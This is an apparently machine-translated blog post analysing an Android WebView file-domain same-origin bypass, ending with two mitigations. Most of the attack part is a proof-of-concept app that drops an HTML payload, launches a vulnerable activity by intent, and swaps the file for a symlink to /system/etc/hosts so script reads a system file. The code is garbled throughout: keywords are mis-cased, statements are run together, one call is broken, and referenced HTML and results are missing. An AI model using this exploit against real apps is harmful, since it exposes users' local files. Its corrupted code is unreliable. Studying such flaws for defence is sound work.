An analysis of the WebView file domain Homologous policy Bypass vulnerability in Android

0x00

Let's start by talking about the effect of a WebView method:

Webview.getsettings (). Setallowfileaccessfromfileurls (false);

To illustrate this approach, let's look at a practical example. The code address or reference Https://github.com/jltxgcy/AppVulnerability/tree/master/WebViewFileDemo.

The code below, and the Android WebView Remote Code Execution Vulnerability analysis of the code in the main difference is the load of the attack_file.html.

public class Mainactivity extends Activity {private WebView webview;private Uri muri;private String url; String MURL1 = "file:///android_asset/html/attack_file.html";//string mUrl2 = "file:///android_asset/html/test.html" ; @Overrideprotected void OnCreate (Bundle savedinstancestate) {super.oncreate (savedinstancestate); Setcontentview ( R.layout.activity_main); WebView = (WebView) Findviewbyid (R.id.webview); Webview.getsettings (). setjavascriptenabled (true); Webview.addjavascriptinterface (new Jsinterface (), "Jsinterface"); Webview.getsettings (). Setallowfileaccessfromfileurls (True); Webview.setwebchromeclient (new Webchromeclient () {@Override public boolean Onjsalert (WebView view, string URL, string message,jsresult result) {//required functionality here return Super.onj Salert (view, URL, message, result);});    Webview.loadurl (MURL1);}            Class Jsinterface {public String OnButtonClick (string text) {Final String str = text;          Runonuithread (New Runnable () {      @Override public void Run () {LOG.E ("leehong2", "onbuttonclick:text =" + str);                Toast.maketext (Getapplicationcontext (), "onbuttonclick:text =" + str, toast.length_long). Show ();                        }            });  Return "This text was returned from Java layer.        JS Text = "+ text; } public void Onimageclick (String url, int width, int height) {final String str = "Onimageclick            : Text = "+ URL +" width = "+ width +" height = "+ height;            LOG.I ("Leehong2", str); Runonuithread (New Runnable () {@Override public void run () {Toast.makete                XT (Getapplicationcontext (), str, toast.length_long). Show ();        }            }); }    }}

Here Webview.getsettings (). Setallowfileaccessfromfileurls (True), which indicates that file files can be accessed through JavaScript.

Let's look at Attack_file.html's code again:

BecauseSetallowfileaccessfromfileurls is true, so webview.load this HTML can return the value of/mnt/sdcard/11.txt. 
If Setallowfileaccessfromfileurls is false,webview.load this HTML can not return the value of/mnt/sdcard/11.txt. 

0x01
Even if Setallowfileaccessfromfileurls is false, we can cross this restriction in one way, that is, the Android WebView file domain homology policy bypass Vulnerability analysis, please refer to WebView Analysis of file domain homologous policy Bypass vulnerability. 
The reference article does not give the works that can be run, here is given, the following explanations are derived from these two projects: Https://github.com/jltxgcy/AppVulnerability/tree/master/WebViewFileDemo1 , Https://github.com/jltxgcy/AppVulnerability/tree/master/AttackWebView.
run WebViewFileDemo1 First, then run Attackwebview to attack WebView. 

We first look at WebViewFileDemo1, the main code is as follows:
Package Com.example.webviewfiledemo;import Android.app.activity;import Android.content.intent;import Android.net.uri;import Android.os.bundle;import Android.util.log;import Android.webkit.jsresult;import Android.webkit.webchromeclient;import Android.webkit.webview;import Android.widget.toast;public class MainActivity Extends Activity {private WebView webview;private Uri muri;private String url; @Overrideprotected void OnCreate (Bundle sav Edinstancestate) {super.oncreate (savedinstancestate); Setcontentview (r.layout.activity_main); WebView = (WebView) Findviewbyid (R.id.webview); Webview.getsettings (). Setjavascriptenabled (True); Webview.addjavascriptinterface (new Jsinterface (), "Jsinterface"); Webview.getsettings (). Setallowfileaccessfromfileurls (false);//webview.getsettings (). Setallowfileaccess (false); Webview.setwebchromeclient (new Webchromeclient () {@Override public boolean onjsalert ( WebView view, string URL, string message,jsresult result) {//required functionality here return super.Onjsalert (view, URL, message, result);}); I Ntent i = getintent (), if (i! = null) {MUri = I.getdata ();} if (MUri! = null) {URL = muri.tostring ();} if (URL! = null) {webview.loadurl (URL);}}}
The activity receives the intent from the outside, extracts the URL inside the intent and loads it.

Then we look at the Attackwebview project, which is the project to send intent to Com.example.webviewfiledemo.MainActivity . The code is as follows:
public class Mainactivity extends Activity {public final static String HTML = "<body>" + "<u>wait a few Sec Onds.</u> "+" <script> "+" var d = document; " + "function Doitjs () {" + "var xhr = new XMLHttpRequest;" + "xhr.onload = function () {" + "var txt = xhr.responsetext;" + "D.body.appendchild (D.createtextnode (TXT));" + "alert (TXT);" +"};" + "Xhr.open (' GET ', d.url);" + "xhr.send (null);" + "}" + "SetTimeout (doitjs,8000);" + "</script>" + "</body>";p ublic static String my_tmp_dir; @Overrideprotected void OnCreate (Bundle Savedin Stancestate) {super.oncreate (savedinstancestate); Setcontentview (R.layout.activity_main); My_tmp_dir = Getdir ("Payload_odex", Mode_private). GetAbsolutePath ();d oit ();} public void doit () {String Html_path = my_tmp_dir + "/a0" + ". HTML"; try {CmdExec ("mkdir" + My_tmp_dir); CmdExec ("Echo \" " + HTML + "\" > "+ Html_path); CmdExec (" Chmod-r 777 "+ my_tmp_dir); Thread.Sleep (Invokevulnapp) ("file://" + HTMl_path); Thread.Sleep (6000), CmdExec ("rm" + Html_path), CmdExec ("ln-s" + "/system/etc/hosts" + "" + Html_path);} catch (Exception e) {//Todo:handle exception}}public void Invokevulnapp (String url) {try {Intent Intent = new Intent (Int Ent. Action_main,uri.parse (URL)); Intent.addcategory (Intent.category_launcher); Intent.setclassname ("Com.example.webviewfiledemo", "com.example.webviewfiledemo.MainActivity"); StartActivity ( Intent);} catch (Exception e) {//Todo:handle exception}}public void CmdExec (String cmd) {try {string[] tmp = new string[] {"/syst Em/bin/sh ","-C ", CMD}; Runtime.getruntime (). EXEC (TMP);} catch (Exception e) {//Todo:handle Exception}}}
Through Invokevulnapp, Com.example.webviewfiledemo.MainActivity was opened and intent was passed. This activity extracted url,url for/sdcard/payload_odex/a0.html,webview loaded with this html,html content as follows:
Public final static String HTML = "<body>" +    "<u>wait a few seconds.</u>" +     "<script>" +
    "var d = document;" +    "function Doitjs () {" +    "var xhr = new XMLHttpRequest;" +    "xhr.onload = function () {" +    "var txt = xhr.responsetext;" +    "D.body.appendchild (D.createtextnode (TXT));" +    "alert (TXT);" +"};" +    "Xhr.open (' GET ', d.url);" +    "xhr.send (null);" + "    }" +    "setTimeout (doitjs,8000);" + "    </script>" +    "</body>";
Whenin the WEBVIEWFILEDEMO1 projectWebView loading a0.html, this HTML function is to delay 8 seconds to read the a0.html itself. We'll go back toAttackwebview project, look down at the code. 
CmdExec ("mkdir" + My_tmp_dir); CmdExec ("Echo \" "+ HTML +" \ ">" + Html_path); CmdExec ("Chmod-r 777" + my_tmp_dir); Thread.Sleep (Invokevulnapp); ("file://" + Html_path); Thread.Sleep (6000), CmdExec ("rm" + Html_path), CmdExec ("ln-s" + "/system/etc/hosts" + "" + Html_path);
After calling Invokevulnapp, after 6 seconds, we first remove the a0.html and then reconnect to the/system/etc/hosts. Note at this pointwhenin the WEBVIEWFILEDEMO1 projectwebview Load a0.html, the function of this HTML is to delay 8 seconds to read the a0.html itself, so 8 seconds after reading is a soft connection/system/etc/hosts. 
The results are as follows:


0x02
How to avoid this situation?
1, Webview.getsettings. Setallowfileaccess (FALSE);
If the  C in the WEBVIEWFILEDEMO1 project If the above code is added to the Om.example.webviewfiledemo.MainActivity OnCreate method, the result of the operation is as follows: 

2, Webview.getsettings. Setjavascriptenabled (FALSE);
An analysis of the WebView file domain Homologous policy Bypass vulnerability in Android